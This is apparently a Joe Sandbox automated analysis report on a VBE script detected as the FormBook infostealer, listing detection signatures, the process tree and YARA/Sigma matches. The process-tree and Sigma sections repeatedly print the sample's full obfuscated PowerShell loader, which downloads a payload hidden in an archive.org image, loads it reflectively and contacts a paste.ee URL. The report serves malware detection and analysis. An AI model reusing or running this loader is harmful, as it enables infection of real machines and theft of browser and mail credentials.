Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
10092024150836 09.10.2024.vbe

Overview

General Information

Sample name:10092024150836 09.10.2024.vbe
Analysis ID:1530632
MD5:17cd7d0a0b68a5c484a848750820837a
SHA1:bff3178427c48734726b5e144c86d0833cd8cc1f
SHA256:5d14ce5f262c2b1f20ed43231cd1ba696a1eac262da9e20d1415045e1a985eea
Tags:vbeuser-abuse_ch
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Yara detected Powershell download and execute
AI detected suspicious sample
Bypasses PowerShell execution policy
Connects to a pastebin service (likely for C&C)
Found direct / indirect Syscall (likely to bypass EDR)
Found suspicious powershell code related to unpacking or dynamic code loading
Injects a PE file into a foreign processes
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Obfuscated command line found
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to detect virtual machines (SLDT)
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 7068 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\10092024150836 09.10.2024.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • powershell.exe (PID: 6568 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: 04029E121A0CFA5991749937DD22A1D9)
      • conhost.exe (PID: 380 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 1492 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • appidtel.exe (PID: 1864 cmdline: "C:\Windows\SysWOW64\appidtel.exe" MD5: 2C04FB942B2735073D75063E9FFBF50C)
          • QEwzeZKCXN.exe (PID: 5908 cmdline: "C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
            • dllhost.exe (PID: 3516 cmdline: "C:\Windows\SysWOW64\dllhost.exe" MD5: 6F3C9485F8F97AC04C8E43EF4463A68C)
              • QEwzeZKCXN.exe (PID: 524 cmdline: "C:\Program Files (x86)\OUrqZIPcglSJTdAkvTvFHaJOthkOXBUHilivdHaBzSySZbhtKHPptGaWYehOtInhXkSFgRUUhhzHu\QEwzeZKCXN.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
              • firefox.exe (PID: 4140 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
SourceRuleDescriptionAuthorStrings
00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
    00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
    • 0x2efc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
    • 0x17122:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
    0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x2bed0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0x1402f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
        Click to see the 14 entries
        SourceRuleDescriptionAuthorStrings
        5.2.appidtel.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          5.2.appidtel.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x2e1c3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x16322:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          5.2.appidtel.exe.400000.0.raw.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
            5.2.appidtel.exe.400000.0.raw.unpackWindows_Trojan_Formbook_1112e116unknownunknown
            • 0x2efc3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
            • 0x17122:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
            SourceRuleDescriptionAuthorStrings
            amsi64_1492.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

              System Summary

              barindex
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFzZTY0Q29tbWFuZCk7ezB9bG9hJysnZGVkQXNzZW1iJysnbHkgPSAnKydbU3lzdGVtLlJlZmxlY3Rpb24uQScrJ3NzZW1ibHldOjpMb2FkKHswfWNvbW1hbmRCeXRlcyk7ezB9dmFpTWV0aG9kID0gW2RubGliLicrJ0lPLkhvbWUnKyddLkdldE1ldGhvZCh7MX1WQUl7MX0pO3swfXZhaU1ldGhvZC5JbnZva2UoezB9bnVsbCwgQCcrJyh7MX0wL2hCUEZtL2QvZWUuZXRzYXAvLzpzcHR0aHsxfScrJywgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdmFkb3sxfSwgezF9ZGVzYXRpdicrJ2Fkb3sxfSwgezF9MXsxfSwgezF9YXBwaWR0ZWx7MScrJ30pKTsnKSAtZiAgW2NIQXJdMzYsW2NIQXJdMzkpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYXNlNjRDb21tYW5kID0gezB9aW1hZ2VUZXh0LlN1YnN0cmluZyh7MH1zdGFydEluZGV4LCcrJyB7MH1iYXNlNjRMZW5ndGgpO3swfWNvbW1hbmRCeXRlcyA9IFtTeXN0JysnZW0uQ29udmVydF06OkZybycrJ21CYXNlNjRTdHJpbmcoezB9JysnYmFz
              Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjV
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjV
              Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $env:comspEc[4,26,25]-JOIN'')( (('{0}im'+'ageUrl = {1}https://ia60010'+'2.us.archive.org/32/ite'+'ms/detah-note-v_202410/De'+'tahNote'+'_V.jpg {1};{0}webClient = '+'New-Obj'+'ect System.Net.WebCli'+'e'+'nt;{0}imageBytes = {0}webClien'+'t.DownloadDat'+'a({0}imageUrl);{0}imageText = [System.Text.Encoding]::UTF8.Ge'+'tString({0}imageBytes);{0}s'+'tartFlag = {1}<<BASE64_START>>{1};{0}endFlag = {1}<<BASE'+'64_END>>{1};{0}startIndex = {0}imageText.IndexOf({0}startFlag);{0}endIndex = {0}imageText.IndexOf({0}endFlag);{0}startIndex -ge 0 -and {'+'0}endIndex -gt {0}startIndex;{0}startIndex += {0}startFlag.Lengt'+'h;{0}base64Length = {0}endIndex - {0}startIndex;{0}base64Command = {0}imageText.Substring({0}startIndex,'+' {0}base64Length);{0}commandBytes = [Syst'+'em.Convert]::Fro'+'mBase64String({0}'+'base64Command);{0}loa'+'dedAssemb'+'ly = '+'[System.Reflection.A'+'ssembly]::Load({0}commandBytes);{0}vaiMethod = [dnlib.'+'IO.Home'+'].GetMethod({1}VAI{1});{0}vaiMethod.Invoke({0}null, @'+'({1}0/hBPFm/d/ee.etsap//:sptth{1}'+', {1}desativado{1}, {1}desativado{1}, {1}desativado{1}, {1}desativ'+'ado{1}, {1}1{1}, {1}appidtel{1'+'}));') -f [cHAr]36,[cHAr]39))", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjV
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJGVudjpjb21zcEVjWzQsMjYsMjVdLUpPSU4nJykoICgoJ3swfWltJysnYWdlVXJsID0gezF9aHR0cHM6Ly9pYTYwMDEwJysnMi51cy5hcmNoaXZlLm9yZy8zMi9pdGUnKydtcy9kZXRhaC1ub3RlLXZfMjAyNDEwL0RlJysndGFoTm90ZScrJ19WLmpwZyB7MX07ezB9d2ViQ2xpZW50ID0gJysnTmV3LU9iaicrJ2VjdCBTeXN0ZW0uTmV0LldlYkNsaScrJ2UnKydudDt7MH1pbWFnZUJ5dGVzID0gezB9d2ViQ2xpZW4nKyd0LkRvd25sb2FkRGF0JysnYSh7MH1pbWFnZVVybCk7ezB9aW1hZ2VUZXh0ID0gW1N5c3RlbS5UZXh0LkVuY29kaW5nXTo6VVRGOC5HZScrJ3RTdHJpbmcoezB9aW1hZ2VCeXRlcyk7ezB9cycrJ3RhcnRGbGFnID0gezF9PDxCQVNFNjRfU1RBUlQ+PnsxfTt7MH1lbmRGbGFnID0gezF9PDxCQVNFJysnNjRfRU5EPj57MX07ezB9c3RhcnRJbmRleCA9IHswfWltYWdlVGV4dC5JbmRleE9mKHswfXN0YXJ0RmxhZyk7ezB9ZW5kSW5kZXggPSB7MH1pbWFnZVRleHQuSW5kZXhPZih7MH1lbmRGbGFnKTt7MH1zdGFydEluZGV4IC1nZSAwIC1hbmQgeycrJzB9ZW5kSW5kZXggLWd0IHswfXN0YXJ0SW5kZXg7ezB9c3RhcnRJbmRleCArPSB7MH1zdGFydEZsYWcuTGVuZ3QnKydoO3swfWJhc2U2NExlbmd0aCA9IHswfWVuZEluZGV4IC0gezB9c3RhcnRJbmRleDt7MH1iYX